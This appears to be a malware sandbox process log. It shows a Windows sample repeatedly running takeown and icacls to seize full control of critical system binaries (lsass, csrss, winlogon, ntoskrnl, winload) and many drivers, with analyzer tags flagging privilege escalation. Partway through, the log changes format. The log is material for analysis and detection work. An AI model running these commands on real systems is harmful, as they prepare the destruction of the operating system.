C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1072
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2156
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:764
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2084
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1228
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1580
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1548
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2780
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:1760
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2464
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:740
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit2⤵PID:2588
-
C:\Windows\system32\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit2⤵PID:2392
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\smss.exe3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit2⤵PID:2948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\csrss.exe3⤵
- Modifies file permissions
PID:380
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit2⤵PID:2328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\wininit.exe3⤵PID:2008
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit2⤵PID:868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\LogonUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\LogonUI.exe /grant "Admin:F"3⤵PID:2240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit2⤵PID:524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\lsass.exe3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit2⤵PID:1360
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\services.exe3⤵
- Possible privilege escalation attempt
PID:1476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit2⤵PID:1940
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winlogon.exe3⤵PID:440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit2⤵PID:1068
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.efi3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\winload.efi /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit2⤵PID:1364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\winload.exe3⤵
- Possible privilege escalation attempt
PID:576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:1232
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\ntoskrnl.exe3⤵
- Modifies file permissions
PID:1004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit2⤵PID:1216
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\svchost.exe3⤵PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\smss.exe && icacls C:\Windows\SysWOW64\smss.exe /grant "%username%:F" && exit2⤵PID:2032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\smss.exe3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\csrss.exe && icacls C:\Windows\SysWOW64\csrss.exe /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\csrss.exe3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\wininit.exe && icacls C:\Windows\SysWOW64\wininit.exe /grant "%username%:F" && exit2⤵PID:1104
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\wininit.exe3⤵PID:2824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\LogonUI.exe && icacls C:\Windows\SysWOW64\LogonUI.exe /grant "%username%:F" && exit2⤵PID:2556
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\LogonUI.exe3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\lsass.exe && icacls C:\Windows\SysWOW64\lsass.exe /grant "%username%:F" && exit2⤵PID:1108
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\lsass.exe3⤵
- Possible privilege escalation attempt
PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\services.exe && icacls C:\Windows\SysWOW64\services.exe /grant "%username%:F" && exit2⤵PID:808
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\services.exe3⤵PID:2980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winlogon.exe && icacls C:\Windows\SysWOW64\winlogon.exe /grant "%username%:F" && exit2⤵PID:1696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winlogon.exe3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.efi && icacls C:\Windows\SysWOW64\winload.efi /grant "%username%:F" && exit2⤵PID:1616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.efi3⤵PID:2352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\winload.exe && icacls C:\Windows\SysWOW64\winload.exe /grant "%username%:F" && exit2⤵PID:1168
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\winload.exe3⤵PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\ntoskrnl.exe && icacls C:\Windows\SysWOW64\ntoskrnl.exe /grant "%username%:F" && exit2⤵PID:2760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\ntoskrnl.exe3⤵PID:1180
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\SysWOW64\svchost.exe && icacls C:\Windows\SysWOW64\svchost.exe /grant "%username%:F" && exit2⤵PID:1124
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\SysWOW64\svchost.exe3⤵PID:3000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394bus.sys && icacls C:\Windows\System32\drivers\1394bus.sys /grant "%username%:F" && exit2⤵PID:2356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394bus.sys3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\1394ohci.sys && icacls C:\Windows\System32\drivers\1394ohci.sys /grant "%username%:F" && exit2⤵PID:2544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\1394ohci.sys3⤵PID:624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpi.sys && icacls C:\Windows\System32\drivers\acpi.sys /grant "%username%:F" && exit2⤵PID:904
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpi.sys3⤵PID:2528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit2⤵PID:1228
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\acpipmi.sys3⤵PID:1704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp94xx.sys && icacls C:\Windows\System32\drivers\adp94xx.sys /grant "%username%:F" && exit2⤵PID:1588
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adp94xx.sys3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpahci.sys && icacls C:\Windows\System32\drivers\adpahci.sys /grant "%username%:F" && exit2⤵PID:2100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpahci.sys3⤵PID:1584
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpahci.sys /grant "Admin:F"3⤵PID:2908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adpu320.sys && icacls C:\Windows\System32\drivers\adpu320.sys /grant "%username%:F" && exit2⤵PID:1796
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\adpu320.sys3⤵
- Possible privilege escalation attempt
PID:1488
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\adpu320.sys /grant "Admin:F"3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit2⤵PID:2172
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\afd.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2076
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"3⤵PID:2376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit2⤵PID:3036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\agilevpn.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"3⤵PID:2084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AGP440.sys && icacls C:\Windows\System32\drivers\AGP440.sys /grant "%username%:F" && exit2⤵PID:1804
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\AGP440.sys3⤵PID:2144
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\AGP440.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\aliide.sys && icacls C:\Windows\System32\drivers\aliide.sys /grant "%username%:F" && exit2⤵PID:2008
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\aliide.sys3⤵PID:2344
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdide.sys && icacls C:\Windows\System32\drivers\amdide.sys /grant "%username%:F" && exit2⤵PID:3028
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdide.sys3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit2⤵PID:656
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdk8.sys3⤵PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1120
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit2⤵PID:2096
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdppm.sys3⤵PID:1560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit2⤵PID:1180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsata.sys3⤵
- Possible privilege escalation attempt
PID:2004
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit2⤵PID:2368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdsbs.sys3⤵
- Possible privilege escalation attempt
PID:2764
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"3⤵PID:2076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit2⤵PID:820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\amdxata.sys3⤵PID:2220
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit2⤵PID:2508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\appid.sys3⤵PID:2388
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arc.sys && icacls C:\Windows\System32\drivers\arc.sys /grant "%username%:F" && exit2⤵PID:668
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arc.sys3⤵
- Modifies file permissions
PID:2856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\arc.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2064
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit2⤵PID:2136
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\arcsas.sys3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit2⤵PID:3000
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\asyncmac.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"3⤵PID:2092
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit2⤵PID:1524
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\atapi.sys3⤵
- Possible privilege escalation attempt
PID:2220
-
-
-
[depth 2] C:\Windows\System32\cmd.exe (PID 2084): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1716): takeown /f C:\Windows\System32\drivers\ataport.sys
        - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Windows\System32\cmd.exe (PID 2764): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\b57nd60a.sys && icacls C:\Windows\System32\drivers\b57nd60a.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 2480): takeown /f C:\Windows\System32\drivers\b57nd60a.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 2700): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3080): takeown /f C:\Windows\System32\drivers\battc.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 1028): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3220): takeown /f C:\Windows\System32\drivers\beep.sys
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3340): icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 2580): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\blbdrive.sys && icacls C:\Windows\System32\drivers\blbdrive.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3212): takeown /f C:\Windows\System32\drivers\blbdrive.sys
        - Modifies file permissions
    [depth 3] C:\Windows\system32\icacls.exe (PID 3276): icacls C:\Windows\System32\drivers\blbdrive.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 2480): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3232): takeown /f C:\Windows\System32\drivers\bowser.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3108): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltLo.sys && icacls C:\Windows\System32\drivers\BrFiltLo.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3248): takeown /f C:\Windows\System32\drivers\BrFiltLo.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3120): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrFiltUp.sys && icacls C:\Windows\System32\drivers\BrFiltUp.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3348): takeown /f C:\Windows\System32\drivers\BrFiltUp.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3160): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3288): takeown /f C:\Windows\System32\drivers\bridge.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3396): icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3200): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerId.sys && icacls C:\Windows\System32\drivers\BrSerId.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3468): takeown /f C:\Windows\System32\drivers\BrSerId.sys
        - Possible privilege escalation attempt
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 3240): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrSerWdm.sys && icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3436): takeown /f C:\Windows\System32\drivers\BrSerWdm.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3492): icacls C:\Windows\System32\drivers\BrSerWdm.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3316): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys && icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3452): takeown /f C:\Windows\System32\drivers\BrUsbMdm.sys
        - Possible privilege escalation attempt
        - Modifies file permissions
    [depth 3] C:\Windows\system32\icacls.exe (PID 3536): icacls C:\Windows\System32\drivers\BrUsbMdm.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3380): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BrUsbSer.sys && icacls C:\Windows\System32\drivers\BrUsbSer.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3460): takeown /f C:\Windows\System32\drivers\BrUsbSer.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3416): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3556): takeown /f C:\Windows\System32\drivers\bthmodem.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3476): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3600): takeown /f C:\Windows\System32\drivers\bxvbda.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3528): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3680): takeown /f C:\Windows\System32\drivers\cdfs.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3568): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3692): takeown /f C:\Windows\System32\drivers\cdrom.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3608): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3736): takeown /f C:\Windows\System32\drivers\circlass.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3640): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3748): takeown /f C:\Windows\System32\drivers\Classpnp.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3780): icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3708): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3908): takeown /f C:\Windows\System32\drivers\CmBatt.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 3728): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3892): takeown /f C:\Windows\System32\drivers\cmdide.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3928): icacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3792): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3900): takeown /f C:\Windows\System32\drivers\cng.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3812): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3984): takeown /f C:\Windows\System32\drivers\compbatt.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3996): icacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3848): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4040): takeown /f C:\Windows\System32\drivers\CompositeBus.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3872): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4072): takeown /f C:\Windows\System32\drivers\crashdmp.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3920): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4048): takeown /f C:\Windows\System32\drivers\crcdisk.sys

